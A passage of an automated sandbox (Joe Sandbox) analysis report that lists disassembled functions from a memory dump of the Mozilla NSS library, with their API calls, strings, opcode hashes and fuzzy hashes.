                                                                          • Part of subcall function 6CB5F820: free.MOZGLUE(FFD3F9E8,2404110F,?,?), ref: 6CB5F868
                                                                          • Part of subcall function 6CB5F820: DeleteCriticalSection.KERNEL32(04C4841B,2404110F,?,?), ref: 6CB5F882
                                                                          • Part of subcall function 6CB5F820: free.MOZGLUE(04C483FF,?,?), ref: 6CB5F889
                                                                          • Part of subcall function 6CB5F820: DeleteCriticalSection.KERNEL32(CCCCCCDF,2404110F,?,?), ref: 6CB5F8A4
                                                                          • Part of subcall function 6CB5F820: free.MOZGLUE(CCCCCCC3,?,?), ref: 6CB5F8AB
                                                                          • Part of subcall function 6CB5F820: DeleteCriticalSection.KERNEL32(280F1108,2404110F,?,?), ref: 6CB5F8C9
                                                                          • Part of subcall function 6CB5F820: free.MOZGLUE(280F10EC,?,?), ref: 6CB5F8D0
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.2818593285.000000006CA91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CA90000, based on PE: true
                                                                        • Associated: 0000000B.00000002.2818550319.000000006CA90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820278681.000000006CC2F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820576408.000000006CC6E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820637137.000000006CC6F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820875411.000000006CC70000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820932273.000000006CC75000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_6ca90000_katB4C0.jbxd
                                                                        Similarity
                                                                        • API ID: free$CriticalSection$Delete$DestroyErrorModule$EnterR_smprintfUnlockValue
                                                                        • String ID: d$tokens=[0x%x=<%s>]
                                                                        • API String ID: 2028831712-1373489631
                                                                        • Opcode ID: e4f75636a4ca04f6b170dcb941a7fdff46e8c4e4575686828cd8293fc0d98016
                                                                        • Instruction ID: f78bb2ead3f3e88849c9b97b544fdb3fd82d00fc4dae36b6bb37e6104cb7a405
                                                                        • Opcode Fuzzy Hash: e4f75636a4ca04f6b170dcb941a7fdff46e8c4e4575686828cd8293fc0d98016
                                                                        • Instruction Fuzzy Hash: B471E2B0A051859BEB019F26DC45B6E3275FF4530DF140035E8099AF43EB32E969CBA6
                                                                        Function 6CB56C30 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 58stringCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000004,6CB5781D,00000000,6CB4BE2C,?,6CB56B1D,?,?,?,?,00000000,00000000,6CB5781D), ref: 6CB56C40
                                                                        • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000004,?,?,?,?,?,?,?,00000000,00000000,6CB5781D,?,6CB4BE2C,?), ref: 6CB56C58
                                                                        • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,rdb:,00000004,?,?,?,?,?,?,?,?,?,?,00000000,00000000,6CB5781D), ref: 6CB56C6F
                                                                        • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000007), ref: 6CB56C84
                                                                        • PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE), ref: 6CB56C96
                                                                          • Part of subcall function 6CB01240: TlsGetValue.KERNEL32(00000040,?,6CB0116C,NSPR_LOG_MODULES), ref: 6CB01267
                                                                          • Part of subcall function 6CB01240: EnterCriticalSection.KERNEL32(?,?,?,6CB0116C,NSPR_LOG_MODULES), ref: 6CB0127C
                                                                          • Part of subcall function 6CB01240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6CB0116C,NSPR_LOG_MODULES), ref: 6CB01291
                                                                          • Part of subcall function 6CB01240: PR_Unlock.NSS3(?,?,?,?,6CB0116C,NSPR_LOG_MODULES), ref: 6CB012A0
                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm), ref: 6CB56CAA
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.2818593285.000000006CA91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CA90000, based on PE: true
                                                                        • Associated: 0000000B.00000002.2818550319.000000006CA90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820278681.000000006CC2F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820576408.000000006CC6E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820637137.000000006CC6F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820875411.000000006CC70000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820932273.000000006CC75000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_6ca90000_katB4C0.jbxd
                                                                        Similarity
                                                                        • API ID: strncmp$CriticalEnterSectionSecureUnlockValuegetenvstrcmp
                                                                        • String ID: NSS_DEFAULT_DB_TYPE$dbm$dbm:$extern:$rdb:$sql:
                                                                        • API String ID: 4221828374-3736768024
                                                                        • Opcode ID: c3e6944e81aadf171851d65a0454ace6cf2c436bdc1f3fa35594871db59251e3
                                                                        • Instruction ID: 0cc226864b12917e6570a1f17cf0fd13052691e8963085f2d904963fe03d209d
                                                                        • Opcode Fuzzy Hash: c3e6944e81aadf171851d65a0454ace6cf2c436bdc1f3fa35594871db59251e3
                                                                        • Instruction Fuzzy Hash: EC01A2F170239127EA002B7B6E4AF26356CDF4119DF940431FF04E0A81FAAAE57442AA
                                                                        Function 6CB0ACC0 Relevance: 19.6, APIs: 13, Instructions: 150stringCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.2818593285.000000006CA91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CA90000, based on PE: true
                                                                        • Associated: 0000000B.00000002.2818550319.000000006CA90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820278681.000000006CC2F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820576408.000000006CC6E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820637137.000000006CC6F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820875411.000000006CC70000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820932273.000000006CC75000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_6ca90000_katB4C0.jbxd
                                                                        Similarity
                                                                        • API ID: free$Unlock$ErrorValuecallocmallocmemcpystrcpystrlen
                                                                        • String ID:
                                                                        • API String ID: 786543732-0
                                                                        • Opcode ID: c931b3d317b7d99ee92eadba23879365bff384d31834151aa0f7c3c60b79954c
                                                                        • Instruction ID: d670a3274397ffd513781351bb7a03692d331bcdc2dbc3207902cf691a4acda9
                                                                        • Opcode Fuzzy Hash: c931b3d317b7d99ee92eadba23879365bff384d31834151aa0f7c3c60b79954c
                                                                        • Instruction Fuzzy Hash: 7651CEB0F002669BDF01EF69D9416AE7BB4FB06349F144A25D808A3B11E730E945CFE2
                                                                        Function 6CB4ADC0 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 110COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • PR_LogPrint.NSS3(C_MessageSignInit), ref: 6CB4ADE6
                                                                        • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CB4AE17
                                                                        • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CB4AE29
                                                                          • Part of subcall function 6CC2D930: PL_strncpyz.NSS3(?,?,?), ref: 6CC2D963
                                                                        • PR_LogPrint.NSS3(?,00000000), ref: 6CB4AE3F
                                                                        • PL_strncpyz.NSS3(?, hKey = 0x%x,00000050), ref: 6CB4AE78
                                                                        • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CB4AE8A
                                                                        • PR_LogPrint.NSS3(?,00000000), ref: 6CB4AEA0
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.2818593285.000000006CA91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CA90000, based on PE: true
                                                                        • Associated: 0000000B.00000002.2818550319.000000006CA90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820278681.000000006CC2F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820576408.000000006CC6E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820637137.000000006CC6F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820875411.000000006CC70000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820932273.000000006CC75000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_6ca90000_katB4C0.jbxd
                                                                        Similarity
                                                                        • API ID: L_strncpyzPrint$L_strcatn
                                                                        • String ID: hKey = 0x%x$ hSession = 0x%x$ (CK_INVALID_HANDLE)$C_MessageSignInit
                                                                        • API String ID: 332880674-605059067
                                                                        • Opcode ID: e99a836c117c2d16446bc9a9ef8a2bcedf437f196840f85fa998ee132fa8451f
                                                                        • Instruction ID: f519da6bed19e239d47c625b16df3d40b5d5361653238beb5a5d2cb7697153b3
                                                                        • Opcode Fuzzy Hash: e99a836c117c2d16446bc9a9ef8a2bcedf437f196840f85fa998ee132fa8451f
                                                                        • Instruction Fuzzy Hash: 7D3105716042A4EFCB01DF14DC98FAE3775FB42319F048035E419ABA01EB349809EFA2
                                                                        Function 6CBE4C40 Relevance: 19.3, APIs: 3, Strings: 8, Instructions: 97COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • sqlite3_value_text16.NSS3(?), ref: 6CBE4CAF
                                                                        • sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6CBE4CFD
                                                                        • sqlite3_value_text16.NSS3(?), ref: 6CBE4D44
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.2818593285.000000006CA91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CA90000, based on PE: true
                                                                        • Associated: 0000000B.00000002.2818550319.000000006CA90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820278681.000000006CC2F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820576408.000000006CC6E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820637137.000000006CC6F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820875411.000000006CC70000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820932273.000000006CC75000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_6ca90000_katB4C0.jbxd
                                                                        Similarity
                                                                        • API ID: sqlite3_value_text16$sqlite3_log
                                                                        • String ID: API call with %s database connection pointer$abort due to ROLLBACK$another row available$bad parameter or other API misuse$invalid$no more rows available$out of memory$unknown error
                                                                        • API String ID: 2274617401-4033235608
                                                                        • Opcode ID: 4b5f2e3b64302a33e96ad5c3ca1d542697767d429575b86a0615c864d888e7af
                                                                        • Instruction ID: 99b5996a951430823aa97379c7858e89ada756321adcb48b661cd8a013eac24e
                                                                        • Opcode Fuzzy Hash: 4b5f2e3b64302a33e96ad5c3ca1d542697767d429575b86a0615c864d888e7af
                                                                        • Instruction Fuzzy Hash: BC317AB2E048E0ABD70447A4A8007A47331F78EFD9F158129D4254BF54DB25AC668FE3
                                                                        Function 6CB42DD0 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 94COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • PR_LogPrint.NSS3(C_InitPIN), ref: 6CB42DF6
                                                                        • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CB42E24
                                                                        • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CB42E33
                                                                          • Part of subcall function 6CC2D930: PL_strncpyz.NSS3(?,?,?), ref: 6CC2D963
                                                                        • PR_LogPrint.NSS3(?,00000000), ref: 6CB42E49
                                                                        • PR_LogPrint.NSS3( pPin = 0x%p,?), ref: 6CB42E68
                                                                        • PR_LogPrint.NSS3( ulPinLen = %d,?), ref: 6CB42E81
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.2818593285.000000006CA91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CA90000, based on PE: true
                                                                        • Associated: 0000000B.00000002.2818550319.000000006CA90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820278681.000000006CC2F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820576408.000000006CC6E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820637137.000000006CC6F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820875411.000000006CC70000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820932273.000000006CC75000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_6ca90000_katB4C0.jbxd
                                                                        Similarity
                                                                        • API ID: Print$L_strncpyz$L_strcatn
                                                                        • String ID: hSession = 0x%x$ pPin = 0x%p$ ulPinLen = %d$ (CK_INVALID_HANDLE)$C_InitPIN
                                                                        • API String ID: 1003633598-1777813432
                                                                        • Opcode ID: 42e3393bf8ad2e58f73bc3f121ce921a30110e2300a719b316593a78e4904dd1
                                                                        • Instruction ID: b3aab51ce9c0e6d15b276b30701768668fff81f70ce5e30f023e51e503a8fd38
                                                                        • Opcode Fuzzy Hash: 42e3393bf8ad2e58f73bc3f121ce921a30110e2300a719b316593a78e4904dd1
                                                                        • Instruction Fuzzy Hash: 1C31F375A011A4EFDB01AB15DC5CF9E3BB5EB42319F048025E909E7B11EB349C49EBB2
                                                                        Function 6CB32C40 Relevance: 18.2, APIs: 12, Instructions: 163COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • TlsGetValue.KERNEL32(6CB33F23,?,6CB2E477,?,?,?,00000001,00000000,?,?,6CB33F23,?), ref: 6CB32C62
                                                                        • EnterCriticalSection.KERNEL32(0000001C,?,6CB2E477,?,?,?,00000001,00000000,?,?,6CB33F23,?), ref: 6CB32C76
                                                                        • PL_HashTableLookup.NSS3(00000000,?,?,6CB2E477,?,?,?,00000001,00000000,?,?,6CB33F23,?), ref: 6CB32C86
                                                                        • PR_Unlock.NSS3(00000000,?,?,?,?,6CB2E477,?,?,?,00000001,00000000,?,?,6CB33F23,?), ref: 6CB32C93
                                                                          • Part of subcall function 6CBBDD70: TlsGetValue.KERNEL32 ref: 6CBBDD8C
                                                                          • Part of subcall function 6CBBDD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6CBBDDB4
                                                                        • TlsGetValue.KERNEL32(?,?,?,?,?,6CB2E477,?,?,?,00000001,00000000,?,?,6CB33F23,?), ref: 6CB32CC6
                                                                        • EnterCriticalSection.KERNEL32(0000001C,?,?,?,?,?,6CB2E477,?,?,?,00000001,00000000,?,?,6CB33F23,?), ref: 6CB32CDA
                                                                        • PL_HashTableLookup.NSS3(00000000,?,?,?,?,?,?,6CB2E477,?,?,?,00000001,00000000,?,?,6CB33F23), ref: 6CB32CEA
                                                                        • PR_Unlock.NSS3(00000000,?,?,?,?,?,?,?,6CB2E477,?,?,?,00000001,00000000,?), ref: 6CB32CF7
                                                                        • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,6CB2E477,?,?,?,00000001,00000000,?), ref: 6CB32D4D
                                                                        • EnterCriticalSection.KERNEL32(?), ref: 6CB32D61
                                                                        • PL_HashTableLookup.NSS3(?,?), ref: 6CB32D71
                                                                        • PR_Unlock.NSS3(?), ref: 6CB32D7E
                                                                          • Part of subcall function 6CB007A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6CA9204A), ref: 6CB007AD
                                                                          • Part of subcall function 6CB007A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CA9204A), ref: 6CB007CD
                                                                          • Part of subcall function 6CB007A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CA9204A), ref: 6CB007D6
                                                                          • Part of subcall function 6CB007A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6CA9204A), ref: 6CB007E4
                                                                          • Part of subcall function 6CB007A0: TlsSetValue.KERNEL32(00000000,?,6CA9204A), ref: 6CB00864
                                                                          • Part of subcall function 6CB007A0: calloc.MOZGLUE(00000001,0000002C), ref: 6CB00880
                                                                          • Part of subcall function 6CB007A0: TlsSetValue.KERNEL32(00000000,?,?,6CA9204A), ref: 6CB008CB
                                                                          • Part of subcall function 6CB007A0: TlsGetValue.KERNEL32(?,?,6CA9204A), ref: 6CB008D7
                                                                          • Part of subcall function 6CB007A0: TlsGetValue.KERNEL32(?,?,6CA9204A), ref: 6CB008FB
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.2818593285.000000006CA91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CA90000, based on PE: true
                                                                        • Associated: 0000000B.00000002.2818550319.000000006CA90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820278681.000000006CC2F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820576408.000000006CC6E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820637137.000000006CC6F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820875411.000000006CC70000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820932273.000000006CC75000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_6ca90000_katB4C0.jbxd
                                                                        Similarity
                                                                        • API ID: Value$CriticalSection$EnterHashLookupTableUnlock$calloc$Leave
                                                                        • String ID:
                                                                        • API String ID: 2446853827-0
                                                                        • Opcode ID: 96a2066f795b3b44ac72a4c88d3b0b9170d8543a594405e48325b9b43439e0df
                                                                        • Instruction ID: 18fdf7209b9a560e5a039b3ea4793e6f9f5c30d52b4d1aef3592362865dc7e7a
                                                                        • Opcode Fuzzy Hash: 96a2066f795b3b44ac72a4c88d3b0b9170d8543a594405e48325b9b43439e0df
                                                                        • Instruction Fuzzy Hash: 06510976D00264ABDB01AF25DC459AA7B78FF1935CB048524EC1C97B12E731ED54C7E2
                                                                        Function 6CB27C70 Relevance: 18.1, APIs: 12, Instructions: 141COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • PR_CallOnce.NSS3(6CC72120,Function_00097E60,00000000,?,?,?,?,6CBA067D,6CBA1C60,00000000), ref: 6CB27C81
                                                                          • Part of subcall function 6CA94C70: TlsGetValue.KERNEL32(?,?,?,6CA93921,6CC714E4,6CBDCC70), ref: 6CA94C97
                                                                          • Part of subcall function 6CA94C70: EnterCriticalSection.KERNEL32(?,?,?,?,6CA93921,6CC714E4,6CBDCC70), ref: 6CA94CB0
                                                                          • Part of subcall function 6CA94C70: PR_Unlock.NSS3(?,?,?,?,?,6CA93921,6CC714E4,6CBDCC70), ref: 6CA94CC9
                                                                        • TlsGetValue.KERNEL32 ref: 6CB27CA0
                                                                        • EnterCriticalSection.KERNEL32(?), ref: 6CB27CB4
                                                                        • PR_Unlock.NSS3 ref: 6CB27CCF
                                                                          • Part of subcall function 6CBBDD70: TlsGetValue.KERNEL32 ref: 6CBBDD8C
                                                                          • Part of subcall function 6CBBDD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6CBBDDB4
                                                                        • TlsGetValue.KERNEL32 ref: 6CB27D04
                                                                        • EnterCriticalSection.KERNEL32(?), ref: 6CB27D1B
                                                                        • realloc.MOZGLUE(-00000050), ref: 6CB27D82
                                                                        • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CB27DF4
                                                                        • PR_Unlock.NSS3 ref: 6CB27E0E
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.2818593285.000000006CA91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CA90000, based on PE: true
                                                                        • Associated: 0000000B.00000002.2818550319.000000006CA90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820278681.000000006CC2F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820576408.000000006CC6E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820637137.000000006CC6F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820875411.000000006CC70000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820932273.000000006CC75000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_6ca90000_katB4C0.jbxd
                                                                        Similarity
                                                                        • API ID: CriticalSectionValue$EnterUnlock$CallErrorLeaveOncerealloc
                                                                        • String ID:
                                                                        • API String ID: 2305085145-0
                                                                        • Opcode ID: e8cc6a1861377de880ed0cfc182378b0ba00e317fcb18764dbf543ddcc380853
                                                                        • Instruction ID: 8e8e6415f37a0b026f126556c822802745f04ce92692facc674a61bb1edb9a44
                                                                        • Opcode Fuzzy Hash: e8cc6a1861377de880ed0cfc182378b0ba00e317fcb18764dbf543ddcc380853
                                                                        • Instruction Fuzzy Hash: E95124B1A001A0DFDF02AF29DC45A7537B5FB46358F15413AED08A7722EB74D850CAA6
                                                                        Function 6CA94C70 Relevance: 18.1, APIs: 12, Instructions: 116threadCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • TlsGetValue.KERNEL32(?,?,?,6CA93921,6CC714E4,6CBDCC70), ref: 6CA94C97
                                                                        • EnterCriticalSection.KERNEL32(?,?,?,?,6CA93921,6CC714E4,6CBDCC70), ref: 6CA94CB0
                                                                        • PR_Unlock.NSS3(?,?,?,?,?,6CA93921,6CC714E4,6CBDCC70), ref: 6CA94CC9
                                                                        • TlsGetValue.KERNEL32(?,?,?,?,?,6CA93921,6CC714E4,6CBDCC70), ref: 6CA94D11
                                                                        • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,6CA93921,6CC714E4,6CBDCC70), ref: 6CA94D2A
                                                                        • PR_NotifyAllCondVar.NSS3(?,?,?,?,?,?,?,6CA93921,6CC714E4,6CBDCC70), ref: 6CA94D4A
                                                                        • PR_Unlock.NSS3(?,?,?,?,?,?,?,6CA93921,6CC714E4,6CBDCC70), ref: 6CA94D57
                                                                        • PR_GetCurrentThread.NSS3(?,?,?,?,?,6CA93921,6CC714E4,6CBDCC70), ref: 6CA94D97
                                                                        • PR_Lock.NSS3(?,?,?,?,?,6CA93921,6CC714E4,6CBDCC70), ref: 6CA94DBA
                                                                        • PR_WaitCondVar.NSS3 ref: 6CA94DD4
                                                                        • PR_Unlock.NSS3(?,?,?,?,?,6CA93921,6CC714E4,6CBDCC70), ref: 6CA94DE6
                                                                        • PR_GetCurrentThread.NSS3(?,?,?,?,?,6CA93921,6CC714E4,6CBDCC70), ref: 6CA94DEF
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.2818593285.000000006CA91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CA90000, based on PE: true
                                                                        • Associated: 0000000B.00000002.2818550319.000000006CA90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820278681.000000006CC2F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820576408.000000006CC6E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820637137.000000006CC6F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820875411.000000006CC70000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820932273.000000006CC75000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_6ca90000_katB4C0.jbxd
                                                                        Similarity
                                                                        • API ID: Unlock$CondCriticalCurrentEnterSectionThreadValue$LockNotifyWait
                                                                        • String ID:
                                                                        • API String ID: 3388019835-0
                                                                        • Opcode ID: c9708add4f42966e9d8d377a0fdb1ee6f3722b080ad983333e45280a8acd44fd
                                                                        • Instruction ID: d685b26572be774bd378ca005480ae3ab1cbd0c1672548937dcac1714c76c51d
                                                                        • Opcode Fuzzy Hash: c9708add4f42966e9d8d377a0fdb1ee6f3722b080ad983333e45280a8acd44fd
                                                                        • Instruction Fuzzy Hash: 5F417BB5A24665CFCF01AF79D09A169BBF4FF06314F064669D8A89B710EB30D884CB91
                                                                        Function 6CC27CD0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 113threadstringCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • PR_GetCurrentThread.NSS3 ref: 6CC27CE0
                                                                          • Part of subcall function 6CBD9BF0: TlsGetValue.KERNEL32(?,?,?,6CC20A75), ref: 6CBD9C07
                                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CC27D36
                                                                        • PR_Realloc.NSS3(?,00000080), ref: 6CC27D6D
                                                                        • PR_GetCurrentThread.NSS3 ref: 6CC27D8B
                                                                        • PR_snprintf.NSS3(?,?,NSPR_INHERIT_FDS=%s:%d:0x%lx,?,?,?), ref: 6CC27DC2
                                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CC27DD8
                                                                        • malloc.MOZGLUE(00000080), ref: 6CC27DF8
                                                                        • PR_GetCurrentThread.NSS3 ref: 6CC27E06
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.2818593285.000000006CA91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CA90000, based on PE: true
                                                                        • Associated: 0000000B.00000002.2818550319.000000006CA90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820278681.000000006CC2F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820576408.000000006CC6E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820637137.000000006CC6F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820875411.000000006CC70000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820932273.000000006CC75000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_6ca90000_katB4C0.jbxd
                                                                        Similarity
                                                                        • API ID: CurrentThread$strlen$R_snprintfReallocValuemalloc
                                                                        • String ID: :%s:%d:0x%lx$NSPR_INHERIT_FDS=%s:%d:0x%lx
                                                                        • API String ID: 530461531-3274975309
                                                                        • Opcode ID: ef33a4b140d16e582a89f02b87ed44c97ff46f4909f1ae4b8adf3af324f63ee3
                                                                        • Instruction ID: fe4accfeeac14681e7828f2c39d10fc213e285ebe60ad3e0c49d2519bf8c426e
                                                                        • Opcode Fuzzy Hash: ef33a4b140d16e582a89f02b87ed44c97ff46f4909f1ae4b8adf3af324f63ee3
                                                                        • Instruction Fuzzy Hash: 3441C6B1A002019FDB04CF39CCD09AB37B6FF85318B25856CE8199BB51EB35E841DBA1
                                                                        Function 6CB5ECE0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 78COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,00000000,?,?,6CB5DE64), ref: 6CB5ED0C
                                                                        • SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CB5ED22
                                                                          • Part of subcall function 6CB6B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6CC418D0,?), ref: 6CB6B095
                                                                        • PL_FreeArenaPool.NSS3(?), ref: 6CB5ED4A
                                                                        • PL_FinishArenaPool.NSS3(?), ref: 6CB5ED6B
                                                                        • PR_CallOnce.NSS3(6CC72AA4,6CB712D0), ref: 6CB5ED38
